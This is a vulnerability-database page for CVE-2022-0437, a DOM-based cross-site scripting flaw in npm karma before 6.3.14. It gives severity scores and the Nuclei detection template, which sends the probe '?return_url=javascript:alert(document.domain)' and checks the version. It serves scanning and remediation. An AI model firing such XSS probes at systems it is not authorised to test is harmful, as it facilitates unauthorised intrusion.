ProjectDiscoveryNUCLEI:CVE-2022-0437karma-runner DOM-based Cross-Site Scripting
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
41.6%
NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability.
id: CVE-2022-0437
info:
name: karma-runner DOM-based Cross-Site Scripting
author: pikpikcu
severity: medium
description: NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Upgrade to the latest version of karma-runner that includes proper input sanitization to mitigate this vulnerability.
reference:
- https://huntr.dev/bounties/64b67ea1-5487-4382-a5f6-e8a95f798885
- https://github.com/karma-runner/karma/commit/839578c45a8ac42fbc1d72105f97eab77dd3eb8a
- https://nvd.nist.gov/vuln/detail/CVE-2022-0437
- https://github.com/karma-runner/karma
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0437
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40882
cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:*
metadata:
max-request: 2
vendor: karma_project
product: karma
framework: node.js
tags: cve2022,cve,oss,huntr,karma,xss,karma_project,node.js
http:
- method: GET
path:
- '{{BaseURL}}/karma.js'
- '{{BaseURL}}/?return_url=javascript:alert(document.domain)'
matchers-condition: and
matchers:
- type: dsl
dsl:
- compare_versions(version, '< 6.3.14')
- type: word
part: body_2
words:
- 'Karma'
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- "(?m)VERSION: '([0-9.]+)'"
internal: true
# digest: 490a0046304402204c97963b2c55d78816e47e9082643bc3392fb33e44a68746d3a1b6d30b22e59a0220154cc96dfecd5bea5399a9a058028f23efaef7dc2388f685ebccc9a656947e23:922c64590222798bb761d5b6d8e72950Related
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
41.6%